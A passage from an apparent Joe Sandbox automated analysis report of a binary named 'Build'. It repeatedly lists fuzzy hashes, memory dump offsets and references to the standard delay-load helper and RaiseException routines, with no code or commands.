                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 212ecd6a790bf5dfa7f4a7a6d3c5817be3b7f469c6dd0e9fe97aa387b00cea1c
                                                                                                    • Instruction ID: 89cb0a38f2189d7496fecd7f7452ec3f1b689904bbaf1d1db55a53b87cb7d87e
                                                                                                    • Opcode Fuzzy Hash: 212ecd6a790bf5dfa7f4a7a6d3c5817be3b7f469c6dd0e9fe97aa387b00cea1c
                                                                                                    • Instruction Fuzzy Hash: 06B0128635D202AC3118B1995E17D3F014CD0C0B29331CD3AF909C1280E4745C0D0332
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 4247998b117d34a67130e7a36f2d2138e55c05c5104e52e288e0b5b4d2e54131
                                                                                                    • Instruction ID: fae674e4831a711ecc5620076690f74be5ea71fe2c7bb12d5201bf9cd3940c52
                                                                                                    • Opcode Fuzzy Hash: 4247998b117d34a67130e7a36f2d2138e55c05c5104e52e288e0b5b4d2e54131
                                                                                                    • Instruction Fuzzy Hash: B3B0128675D202BD312471955D17C3F010CD0C0F293318E3AF505C0080A4745C080232
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: c02192d88398ba2594c45c6257d873836c9262b1e7fe52d4ca7c45685a02b2e2
                                                                                                    • Instruction ID: a26a61b4f4fabb85818804ff24fbf1bd8366d0140da33509d3e2a15a1b13a38c
                                                                                                    • Opcode Fuzzy Hash: c02192d88398ba2594c45c6257d873836c9262b1e7fe52d4ca7c45685a02b2e2
                                                                                                    • Instruction Fuzzy Hash: F9B0129635D202AC3114B19A5D17D3F014CD0C0F293318D3AF509C1180E4645C080332
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 9ad2d481632dc7a9c6681c6a70d2a101d1d6382106d1ce44c29a734a6b719a7b
                                                                                                    • Instruction ID: 001d0edd60b12333e934e1c5a87c4e814a3278baf0f238d55a52351ee8e15d52
                                                                                                    • Opcode Fuzzy Hash: 9ad2d481632dc7a9c6681c6a70d2a101d1d6382106d1ce44c29a734a6b719a7b
                                                                                                    • Instruction Fuzzy Hash: A7B0129635D202AC3114B1995E17D3F014CC0C0B293318D3AF909C1180E4645D090332
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 708013b448729bea73ad4d2937942489be23874eb865e0045cf718dc6aad24a4
                                                                                                    • Instruction ID: 0b19bb80b0724b3381e4d6536a6c7aa87d775a0e8cc205c782a503944443b441
                                                                                                    • Opcode Fuzzy Hash: 708013b448729bea73ad4d2937942489be23874eb865e0045cf718dc6aad24a4
                                                                                                    • Instruction Fuzzy Hash: 8AB0129635E302AC3254B2995D17D3F014CC0C0B293318E3EF509C1180E4685C480332
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 0979035e0cdde893238a461ce0a591e1a06778a189c0751d632ecd6b8348d7fc
                                                                                                    • Instruction ID: cdedfdfa10254740daedb7a02ce6c22f1ad762ca064a2fed01f9033c86242d19
                                                                                                    • Opcode Fuzzy Hash: 0979035e0cdde893238a461ce0a591e1a06778a189c0751d632ecd6b8348d7fc
                                                                                                    • Instruction Fuzzy Hash: 85B0129636D202AC3114F1995E17D3F01CCC0C0B2D3318D3AF909C2180E4645C090332
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 009408A7
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 75a79ed674e34a689f05ca5e9e7f0901a0dc9264a1180f785a0838725ea3dd07
                                                                                                    • Instruction ID: d7a340351ef870d3a6dcf61a989205ca475566156f3f5942e29569b03ff87441
                                                                                                    • Opcode Fuzzy Hash: 75a79ed674e34a689f05ca5e9e7f0901a0dc9264a1180f785a0838725ea3dd07
                                                                                                    • Instruction Fuzzy Hash: 4EB0128235C300AC3208B1895D52D3E024CC0C0B25330892EF608C13C2F4645C8C6332
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 009408A7
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 6d34e4f5e8cde70507f7e21a2037cfc88fafd87a410f0f055d3dda135cd79f91
                                                                                                    • Instruction ID: d840e1165b670344573a1664985f39d7afa7252807e802e8a06a9b6abcb03d7c
                                                                                                    • Opcode Fuzzy Hash: 6d34e4f5e8cde70507f7e21a2037cfc88fafd87a410f0f055d3dda135cd79f91
                                                                                                    • Instruction Fuzzy Hash: 6CB0128239C300AC3108B1895D12E3E024CD0C0B25330882EF608C1382F4645C481332
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 009408A7
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: e7ce6458ce2eef233a5ae1a54d07b82c7cecaf69506f7b48cc8d2ede3e8b928e
                                                                                                    • Instruction ID: a35e4cb8144b7835ad6808f58826a146a9054711ce72298233de6bdaa9af5af7
                                                                                                    • Opcode Fuzzy Hash: e7ce6458ce2eef233a5ae1a54d07b82c7cecaf69506f7b48cc8d2ede3e8b928e
                                                                                                    • Instruction Fuzzy Hash: 62B0128236C200BC3108B1899D02E3E024CD0C0B253308A2FF609C1282F4655C481332
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 009409FC
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 299a1b65ec50a868a1d1ab396fbedb10469acdfa94a3b22580b17677a89c108a
                                                                                                    • Instruction ID: b9248e5a9e11c1ab1c3ffd85c7e11d406d7b2941e07425a4e0f21a79320a8fa6
                                                                                                    • Opcode Fuzzy Hash: 299a1b65ec50a868a1d1ab396fbedb10469acdfa94a3b22580b17677a89c108a
                                                                                                    • Instruction Fuzzy Hash: D1B012C639C201FC3104B189AD12C36410CC8C0B2DB30C93AF604C408298755C090331
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00940A5D
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: f6a3599fa1b8f1ba3a81fdff171222555d3a937ec6bfdd827fcc7166dba7b4ba
                                                                                                    • Instruction ID: dd329ffbe7f5e958c7c75f5ff94916e72b08407adb7692f3adf0ec1873276be1
                                                                                                    • Opcode Fuzzy Hash: f6a3599fa1b8f1ba3a81fdff171222555d3a937ec6bfdd827fcc7166dba7b4ba
                                                                                                    • Instruction Fuzzy Hash: 66B012C17AC300FC3348B1D99C2AD36018CD0C0B25330892BF508C11C0D4745C4D0331
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00940A5D
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: eaa7be3e6d3cbe5cb8e1013581b35de69b43efa16d5244cd1552a1055d94f7a4
                                                                                                    • Instruction ID: 4cf05626d231761e86d9c5a7a311e677b74f5cf59363b07c2f13d35dc18a9728
                                                                                                    • Opcode Fuzzy Hash: eaa7be3e6d3cbe5cb8e1013581b35de69b43efa16d5244cd1552a1055d94f7a4
                                                                                                    • Instruction Fuzzy Hash: DFB012C179C300FC3208B1D99C2AD36018CD0C0B25330C82BF908C21C0D4745C0D0331
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 009409FC
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 59948ce540003fef9377c2df1a7f9f93ac9c6bf526cfec26a06e54e6a3ba75ed
                                                                                                    • Instruction ID: ae6af2d781031fe49f8864dc19bf6e29311e6df0d3160b297c5e4be2ecfed37c
                                                                                                    • Opcode Fuzzy Hash: 59948ce540003fef9377c2df1a7f9f93ac9c6bf526cfec26a06e54e6a3ba75ed
                                                                                                    • Instruction Fuzzy Hash: A4B012C139C300EC3204F199EC12E36014CC0C0B257308A3AF508C12C1D4755C4C1331
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 009409FC
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 0003c45d9ae56067bf181176f1a2b5fa6341373329e727cd884ff9db814b41bc
                                                                                                    • Instruction ID: 3a80b98e1daaf7b54888a6ddd102c34752c64e124c545d44631fa41aa3734fac
                                                                                                    • Opcode Fuzzy Hash: 0003c45d9ae56067bf181176f1a2b5fa6341373329e727cd884ff9db814b41bc
                                                                                                    • Instruction Fuzzy Hash: 36B012C13AC200EC3104F199ED12E37014CC0C0B25730C93AF608C5181D4755C0D0331
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 009409FC
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
